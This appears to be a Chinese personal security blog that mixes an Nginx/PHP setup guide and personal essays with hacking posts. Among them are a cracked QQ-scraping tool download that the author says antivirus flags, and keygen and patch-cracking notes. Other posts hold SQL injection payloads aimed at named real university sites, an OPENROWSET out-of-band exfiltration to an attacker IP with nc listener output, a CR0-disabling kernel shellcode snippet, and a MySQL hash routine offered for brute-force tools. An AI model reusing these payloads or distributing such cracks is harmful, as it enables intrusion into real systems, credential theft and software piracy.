KYO的地盘

配置Windows下Nginx + PHP 开发环境

1 先到以下地址下载合适的版本

http://nginx.org/en/download.html
http://windows.php.net/download
我下载的版本是 Nginx/Windows-0.8.36 和 PHP-5.3.2(VC9 x86 Non Thread Safe)Zip包。
分别解压到了
D:\webserver\nginx
和
D:\webserver\php
2 配置nginx

打开D:\webserver\nginx\conf\nginx.conf
将从server开始的每一行前面都增加#注释掉包括server，但是不要注释掉最后一个 } 。
然后在#server前面粘贴以下内容

server {
listen 80;
server_name localhost;
root "D:/web/new/localhost";
index index.html index.htm index.php;

location ~ \.php {
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
include fastcgi.conf;
}
}

这代表着配置了第一个虚拟主机
localhost域名将配置在D:/web/new/localhost 目录下
而这里必须使用/符号而不能使用windows格式的\符号
否则会启动不来，查看日志会发现被告知找不到 D:\webew 这个目录。
在新配置的server 上一行加入

autoindex on;

以打开查看目录选项，便于开发。

然后运行d:\webserver\nginx\nginx.exe
在建立 D:\web\new\localhost
并在该文件夹随便建立几个文件和文件夹。
在浏览器中输入 http://localhost
可以浏览目录，说明nginx启动成功。
3 配置 php
复制D:\webserver\php\php.ini-development
并改名为 D:\webserver\php\php.ini
打开php.ini
查找short_open_tag = Off
修改为 short_open_tag = On
在文件末尾加入

extension_dir = "D:\webserver\php\ext"

extension=php_curl.dll
extension=php_gd2.dll
extension=php_mbstring.dll
extension=php_mysql.dll
extension=php_mysqli.dll
extension=php_pdo_mysql.dll
extension=php_pdo_sqlite.dll
extension=php_sockets.dll
extension=php_sqlite.dll
extension=php_sqlite3.dll
extension=php_exif.dll
date.timezone = Asia/Chongqing

以打开常用的扩展，并设置默认时区为重庆。
保存之。
下面运行
D:\webserver\php\php-cgi.exe -b 127.0.0.1:9000 -c D:\webserver\php\php.ini
再 d:\web\new\localhost 目录下建立 phpinfo.php
输入

phpinfo();
?>

再浏览器里输入 http://localhost/phpinfo.php
可以看到phpinfo信息表示配置完成。
4 制作维护脚本，并设置为开机自启动。
由于是开发环境，所以不必添加为系统服务，只要开机能启动就可以了。
将 d:\webserver\nginx\nginx.exe 创建一个狂接方式，并添加到开始菜单-->启动项里面去。
这样开机nginx就启动了。
在 d:\webserver 文件夹下建立 nginx_reload.txt文件。
里面输入

d:
cd \webserver\nginx\
nginx.exe -s reload

然后修改扩展名，为nginx_reload.bat。
这样当修改虚拟主机配置后，或修改rewrite规则后，可直接双击该文件完成nginx配置的重新加载。
而不必再在任务管理器内结束2个nginx.exe进程，再双击nginx.exe以完成重启。
php的启动比较特殊，启动后控制台窗口会一直停留着，如果关闭控制台，或按Ctrl C ，则php-cgi.exe进程会被终止。
所以要建立一个后台运行的vbs脚本。
在 d:\webserver 文件夹下建立一个 php.txt文件
输入

Set objShell = createObject("Wscript.Shell")
objShell.Run("tskill php-cgi"), 0, TRUE
objShell.Run("D:\webserver\php\php-cgi.exe -b 127.0.0.1:9000 -c D:\webserver\php\php.ini"), 0, TRUE

并改名为php.vbs
这时候双击此文件，会杀掉所有正在运行的php-cgi.exe进程，并重新启动一个php-cgi.exe进程。
由于是开发环境，我们只启动一个php-cgi.exe进程就可以了。
将此文件创建一个快捷方式，并添加到开始菜单-->启动项里面去。
这样 php就开机自动启动了。
下面可以修改一下php.ini文件，和重启一下电脑测试看看是否管用。
5 配置PATH_INFO 变量，以支持PHP框架中的URL路由。
现有的各种php框架中，都有url路由功能，使url格式都为 http://example.com/index.php/object/action/value/
这是基于 php的全局变量 $SERVER['PATH_INFO']的。
而nginx只对 php-cgi.exe进行简单的代理，并不支持 PATH_INFO。
所以我们需要略微修改配置
打开 d:\webserver\nginx\conf\fastcgi.conf
加入一行

fastcgi_param PATH_INFO $fastcgi_script_name;

打开 d:\webserver\nginx\conf\nginx.conf
修改所有虚拟主机配置里的

location ~ \.php$ {
....
}

去掉 \.php$ 后面的$
(当然，本文中的已去掉)。
然后我们运行 d:\webserver\nginx_reload.bat。
这时我们的nginx 就支持 url路由了。

暴雨在线QQ搜索 v2011-8-15 破解版

貌似是最新版，可提取QQ群信息。
官方价值98元。

加了一个壳，360报毒。不过你要是觉得不安全全的话可以不用。
密码是：1

File: Click to Download

使用教程在这：http://soft.huoxr.com/262923863225628320342594531243.html

暴雨在线QQ搜索注册机暴雨在线QQ搜索破解版暴雨在线QQ搜索2010-1-17贺岁版注册机

暴雨在线QQ搜索2010-1-17贺岁版

做SEO挺方便的。算法极为简单。网页版注册机代码如下：

暴雨在线QQ搜索 2010-1-17贺岁版-注册机 by kyo

暴雨在线QQ搜索 2010-1-17贺岁版-注册机 by kyo

机器码：

注册码：

Image: attachments/month_201111/27_165629_if8lav.jpg

爆破更简单，仅仅是一个跳转而已。
新版本《暴雨在线QQ搜索 v2011-8-15 迷你版》。貌似作者不敢放出完整版了。
以作者这种防范手段，放出来只能是死路一条。

tips7

oracle绕过过滤的一种方法
使用execute immediate执行以字符表示的查询，来绕过过滤

declare
l_cnt varchar2(20);
begin
execute immediate 'sel'||'ect utl_inaddr.get_host_address fr'||'om dual'
into l_cnt;
dbms_output.put_line (l_cnt);
end;
------------------------------------------------------------------------
至于多语句执行可以使用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES函数的漏洞注射
-----------------------------------------------------------------------------------------------------
登陆框注入
http://welfare.tku.edu.tw/we_admin.aspx

-1' union select 1,1,1 as [password] from we_admin where '1'='1

1

---------------------------------------------------------------------------------------------------------------------------------

先在本地用NC监听一个端口，比如5678

然后再利用openrowset来连本机的5678端口。

http://esquery.tku.edu.tw/acad/good1.asp?t_name=歐陽崇榮&s_dept=TABXB&classname=圖書館學統計

&t_id=071726';select a.* FROM OPENROWSET('SQLOLEDB','116.255.144.197,1444';'sa';'sa','select

* FROM pubs.dbo.authors') as a;--

C:\>nc -vvlp 1444
listening on [any] 1444 ...
163.13.229.43: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [116.255.144.197] from (UNKNOWN) [163.13.229.43] 4336: NO_DATA

Pinging esquery.tku.edu.tw [163.13.229.38] with 32 bytes of data:
----------------------------------------------------------------------------------------------------------------------------
_declspec(naked)
就是告诉编译器，在编译的时候，不要优化代码，通俗的说就是
没代码，完全要自己写
比如
#define NAKED __declspec(naked)

void NAKED code(void)
{
__asm
{
ret
}
}
使用__declspec(naked)关键字定义函数:
使用 naked 关键字必须自己构建 EBP 指针 (如果用到了的话);
必须自己使用 RET 或 RET n 指令返回 (除非你不返回);

堆栈要自己平衡例如：
VOID __declspec(naked) ShellCode()
{
__asm
{
pushad
mov eax , cr0
push eax
and eax, 0xFFFEFFFF
mov cr0 , eax
cli
mov eax , 0xAAAA5555
mov dword ptr[eax] , 0x33343536
sti
pop eax
mov cr0 , eax
popad
ret 0x4
}
}

聊城

一个技术问题演变成商务问题，紧接着又演变为政治问题，我无法理解中国的官场社会。

相对来说，我更喜欢与0和1打交道，人还是太复杂，我没有办法掌控对方的思维下一秒在想什么。所以对于不确定的事，我没有任何兴趣，也不想有任何兴趣。

聊城的温泉还是很不错的，只是一个人的旅游能算是旅游吗？说它是为公事出差附带的附属品我倒没什么意见。

另外对于没有共同语言的人，我一般喜欢选择沉默。有时候为了避免所接触的人把"不合群"这个贬义词强加到我的头上，我曾经试图改变我自己，会附和着一些不着边或者连我自己都不知道的话，现在回头想想才发现这种做法很幼稚，幼稚的让我一个人独处时想起来还会觉得可笑。深思之后我会发现，在这个世界上我在意的人屈指可数，何必委屈自己附和那些不着边际的人呢？

古人云：无欲则刚。这四个字还是很有哲学道理的。

黑客网址记录

0day发布网址Tags>>0day发布网址
1 http://www.frsirt.com

1.http://www.exploit-db.com/

2 http://www.derkeiler.com
http://www.h4cky0u.org

3 http://www.security.nnov.ru/ http://securityvulns.com/

http://governmentsecurity.org/

4 http://pforum.pccenter.com.tw/viewthread.php?tid=67&extra=page%3D1

5 http://www.swerat.com/forums/index.php?act=Login&CODE=01

6 http://chasenet.org/

7 http://swerat.com/
http://www.neoteam.com.br
我先来几个我认为比较好的
http://packetstormsecurity.nl/
http://hack.com.ru/
http://www.hackcoza.tk/
http://www.web-hack.ru/
http://www.securiteam.com/
http://www.security.nnov.ru/
http://www.hackerzhell.co.uk/indexmain.php
http://hacktheb0x.tk/
http://neworder.box.sk/
http://www.k-otik.com/
http://www.security-corporation.com/
http://www.securityfocus.com/

8 http://metasploit.blogspot.com/

9 http://www.godexp.org/
http://www.milw0rm.com/

自己珍藏的0day漏洞发布网址

这些都是我珍藏的好的漏洞发布网址:
国外:
http://www.frsirt.com/exploits/
http://es.wikipedia.org/wiki/Exploit
http://www.securiteam.com/exploits
国内:
http://www.z1z8.com/
http://forum.eviloctal.com/simple/index.php?f22.html

//////////////////////////////////////////////////////////////////////////

国外安全 http://www.neohapsis.com/ 内容极为丰富
国外安全 http://www.deadly.org/ 大量关于OpenBSD的资料文档教程
国外安全 http://www.guninski.com/ 安全专家Guninski的主页，有大量由系统漏洞
国外安全 http://www.sysinternals.com 有很好的windows下的工具及源代码
国外安全 http://www.securityflaw.com/bible/ 入侵检测等文档整理较好的站点
国外安全 http://www.secinf.net/ 网络安全方面的大量文档
国外安全 http://www.incident-response.org 入侵反应，数据恢复工具等
国外安全 http://www.securityfocus.com/ 安全资料整合最好的站
国外安全 http://www.project.honeynet.org/ 由安全界一帮牛人组织的一个

国外安全 http://www.packetstormsecurity.com 资料全面的安全站

国外安全 http://www.securityportal.com/ 还可以看看的安全站

国外安全 http://www.ussrback.com/ 比较活跃的安全站
国外安全 http://www.attrition.org/ 内容全面的安全站
国外安全 http://www.wiretrip.net/rfp/2/index.asp rfp的安全主页，提供权威的安全信息

国外安全 http://www.antionline.com/ 有些特色栏目的安全站
国外安全 http://www.eeye.com/ eeye公司的主页，提供权威性的安全建议和工具
国外安全 http://www.insecure.org/ Fyodor的主页，nmap的老家，还有exploit
国外安全 http://www.atstake.com/ @stack公司的主页，提供权威的安全建议
国外安全 http://www.bugnet.com/ 提供漏洞修补国外黑客 http://lsd-pl.net/ LsD的站,最新最有效的exploit
国外黑客 http://www.s0ftpj.org 提供一些水平很高的小工具 }\]{f6'
国外黑客 http://phrack.org/ Phrack的主页，经典的黑客技术电子杂志
国外黑客 http://www.w00w00.org/ w00w00组织的主页
国外黑客 http://mixter.void.ru/ Mixter的个人主页，不少有用的工具
国外黑客 http://www.thehackerschoice.com/ THC黑客组织的页面，很好的安全文档和工具
国外黑客http:// www.win2000mag.net Windows & .NET Magazine Network 绝对专业的站点,文章都是一流的

国外黑客 http://www.2600.com/ 2600 Magazine
国外黑客 http://www.experts-exchange.com 全球有名的社区
国外黑客 http://www.is-it-true.org 类似于FAQ的站点，资源丰富
国外黑客 http://www.mixter.warrior2k.com mixter security
国外黑客 http://www.liun.hektik.org Long Island our Underground Networks
国外黑客 http://www.ussrback.com ussr is back
国外黑客 http://www.securiteam.com 非常好的安全文章漏洞利用工具下载站点
国外黑客 http://www.lsd-pl.net The Last Stage of Delirium Research Group
国外黑客 http://www. neworder.box.sk Box Network team
国外黑客 http://www.sysinternals.com sysinternals
国外黑客 http://www.webattack.com
国外黑客 http://www.blackhat.com Black Hat, Inc A64bZ
国外黑客 http://p.ulh.as pulhas
国外常用网站站点 http://www.google.com 最好的页面搜索引擎

国外常用网站站点 http://www.netcraft.com 很好的域名搜索引擎

国外常用网站站点 http://www.checkdomain.com 域名信息检索器

国外常用网站站点 http://astalavista.box.sk 最好的注册码、注册机、序列号搜索引擎

收藏~

然后

不知从什么时候起，我注意到现在越来越多的人说话已经离不开"然后"这个词了。特别是现实生活中人与人之间对话中的只言片语很容易体现出这一点。为了对抗这个无聊的世界，我也是没事找事做，思考了这一现象的原因。

我觉得这一现象归根结底就是人们语言表达能力退化的一个标志。大多数人不能在短时间内思考到前一句话与后一句话之间的存在的某种联系，一时又想不出较为合适的词语来衔接，只能用拙劣的"然后"来代替。并且我发现"然后"这个词其实是万能的，不论是因果关系、转折关系、前言不搭后语关系，使用它后倒显得挺自然的。再一点，两个人在对话时，一方为了不凸显自己吞吞吐吐的尴尬，"然后"一词一出就可以为自己赢得5秒钟思考时间来准备下一句的内容，甚至故意把它拖得很长，以便可以理直气壮的思考一大会儿。

也许还有下面一个原因，是我从百度搜出来的结果：

"就是因为大家看了太多台湾电视电影才传过来的啊，呵呵。"

其实我亦是一样的。在这个信息化的时代，计算机所带来的优点当然是数不胜数，可是它却让人们之间的交流变得越来越少，亲人与亲人之间、朋友与朋友之间、同学与同学之间，言语上的都变得淡漠。
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

全民种菜，然后凸显全民无聊，然后中国人大多数其实都很无聊，然后我发现北京人大多数都喜欢说自己多牛逼、谁谁谁多牛逼，然后我觉得谁都不牛逼，然后我心中的神已死，然后我觉得其实只有死了的人才牛逼。
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

mysql 口令算法

唠一唠mysql的口令算法

Author: kyo327
email: humour327#hotmail.com
Date: 2010-03-10

大家都知道mysql口令的加密分两种。一种是古董级别的mysql323加密，另一种是蒙骗了大众的的mysql sha1加密。
虽然现在遇到这样的加密可以用cain来破解，按说我不用在这里多此一举，但本文不是为了破解而写，只是科普一下，让大家更清楚的了解mysql口令的加密方法到底是怎样的。

先说mysql4.1.x版本以后的：

mysql> select password('kyo327');
+-------------------------------------------+
| password('kyo327') |
+-------------------------------------------+
| *B19CB640DF626A73397BFBBB8111D11E2BEC11F1 |
+-------------------------------------------+
1 row in set (0.02 sec)

mysql> select sha1('kyo327');
+------------------------------------------+
| sha1('kyo327') |
+------------------------------------------+
| d81e2a1a72f5a4f570b0f05baaa0cffc5d2d6820 |
+------------------------------------------+
1 row in set (0.03 sec)

很明显不是标准的sha1加密。然而这个问题像是皇帝的新装一样，好像没有哪个人指出来，那我就在这里当一次无知的小孩吧。再看下面

mysql> select sha1(0xd81e2a1a72f5a4f570b0f05baaa0cffc5d2d6820);
+--------------------------------------------------+
| sha1(0xd81e2a1a72f5a4f570b0f05baaa0cffc5d2d6820) |
+--------------------------------------------------+
| b19cb640df626a73397bfbbb8111d11e2bec11f1 |
+--------------------------------------------------+
1 row in set (0.00 sec)

我想无需用过多言语，大家应该都很清楚mysql4.1.x以后版本的加密方式了吧。

接下来说一说mysql323加密。

这个我是直接从mysql源代码里抠出来的。代码如下：

#include "stdio.h"
#include

void hash_password(long *result, const char *password, int password_len)
{
register long nr=1345345333L, add=7, nr2=0x12345671L;
long tmp;
const char *password_end= password + password_len;
for (; password < password_end; password++)
{
if (*password == ' ' || *password == '\t')
continue; /* skip space in password */
tmp= (long) (char) *password;
nr^= (((nr & 63)+add)*tmp)+ (nr << 8);
nr2+=(nr2 << 8) ^ nr;
add+=tmp;
}
result[0]=nr & (((long) 1L << 31) -1L); /* Don't use sign bit (str2int) */;
result[1]=nr2 & (((long) 1L << 31) -1L);
}

int main(int argc, char* argv[])
{
const char *password="kyo";
long hash_res[2];
hash_password(hash_res, password, (int) strlen(password));
printf("%08lx%08lx\n", hash_res[0], hash_res[1]);
return 0;
}

运行后
7901b47128d1045d
-----------------------------------------------------------------------------------
mysql> select old_password('kyo');
+---------------------+
| old_password('kyo') |
+---------------------+
| 7901b47128d1045d |
+---------------------+
1 row in set (0.00 sec)
-----------------------------------------------------------------------------------

over。
想做mysql密码爆力破解工具的，根据本文应该很容易写出来了。
------------------------------------------------------------------------------------------------------

mysql> use mysql;
Database changed
mysql> select password from user where user='root';

///////////////////////////////////////////////////////////////////////////////////////////
select password from mysql.user where user='root';

tips 条件断点

在mysql中。
mysql> select * from z_admin where admin='admi\'';
Empty set (0.00 sec)
mysql> select * from z_admin where admin='admi\';
'> ';
Empty set (0.02 sec)

可以看到这个语句是没法执行的。
select * from z_admin where admin='admi\'
应该是把\'解释成字符串中的单引号了，那么就缺少闭合的单引号。
----------------------不华丽的分割线-------------------------------------
而在mssql中。
select * from backupfile where filegroup_name='de\''
会出现这种情况。
服务器: 消息 105，级别 15，状态 1，行 1
字符串 'de\'
' 之前有未闭合的引号。
服务器: 消息 170，级别 15，状态 1，行 1
第 1 行: 'de\'
' 附近有语法错误。

select * from backupfile where filegroup_name='de\'
语句这样的话能顺利执行。
这说明 mssql是只鸳鸯啊，只要不是成对出现就不让你执行，和mysql刚好相反。

有什么用呢？？？？
我说一种，其他的自己琢磨。
在php+mssql的环境下当magic_quotes_gpc==on时，不用管他。
开启错误提示的话 fuck.php?a=aaaaa' and @@version=0--
and后面随便跟什么语句慢慢来爆

没开错误提示的话。直接fuck.php?a=aaaaa' union select 1,2,3-- 慢慢猜吧

////////////////////////////////////////////////////
下注册表函数的断点。
在RegQueryValueExA处下条件断点：[esp+8]=="ProgData"&&[esp+14]!=0
在RegOpenKeyExA处下条件断点：[esp+8]=="Software\\EUsoft\\superdic"

唠一唠加密与解密

Author: kyo327
email: humour327#hotmail.com
Date: 2010-03-03

我认为加密与解密就是高级智慧生物一种脑力活动方式，也是区别于其他动物最明显的标志之一。几千年以前凯撒曾经使用一种加密方法用于传递战争中的信息，其实这段历史足以说明加密解密是人类智慧的结晶。在冷兵器时代打仗不就是两军交战，多者胜吗？但是信息加密的出现打破了这种常规，在测探军机要情后总要经过信息的传递，而那种加了密的信息即便被对方截获也看不出东南西北来，这样在知己又知彼的情况下再熟练的运用三十六计很容易就能以少胜多了。可见信息加密的重要性。

计算机的面世凸现了人类喜欢利用加密与解密庸人自扰的现实。很早的时候软件程序根本没有壳的概念，因为没有很多人看的懂那些二进制代码，所以程序作者可以用最简单的直接比较的认证方式来阻挡没有付费的使用者。随着学习计算机的人越来越多，无聊的人就编出了反汇编器，这样二进制代码被转换成了汇编指令，人们理解程序流程就方便多了。眼看程序开发者辛辛苦苦开发的软件被人们轻易的破解，于是壳出现了，越来越多的加密算法也出现了。而破解者也不甘心，有加密就有解密，不然算法的设计者也无法解出答案。而最无辜的用户始终是受害者，他们想要的仅仅是程序的应用，却不得不运行程序之外为了阻挡破解者的壳、VM、成千上万行的垃圾代码，软件的运行速度竟然要卡十几秒钟才能启动。用户也许很疑惑，现在电脑的硬件CPU都是4核的，内存4G还是双通道的，可为什么还不如win98时代在64M内存的机器上的运行速度呢？其实用户每运行一次加了VM的软件，还要连带的安装并运行一个带解释器的虚拟机，那速度能快得起来才真是奇迹呢。也许很多人认为那些设计VM的作者的脑袋应该是被驴踢了，其实我觉得也是。但我们应该知道，这可能也不是他们的意愿，是被那些无聊的破解者给逼出来的。而用户都成了设计开发者与破解者智慧斗争中的牺牲品。

其实网络安全的世界也是一样的，如果没有黑客，程序开发者闲的蛋疼才去过滤那些乱七八糟的特殊字符呢，他们巴不得把应用设计好了就利用空余时间偷偷菜呢。而利用WEB赚钱的企业所部署的防火墙、招聘的网络安全工程师、购买的漏洞扫描软件等等所花费的RMB不会是从天上掉下来的，羊毛出在羊身上，吃亏的还是无辜的用户。因此用户又一次成了程序员与黑客智慧斗争的牺牲品。

也许在我为所不知的很多领域，用户应该也是所有无聊者与对抗无聊者之间斗争的牺牲品。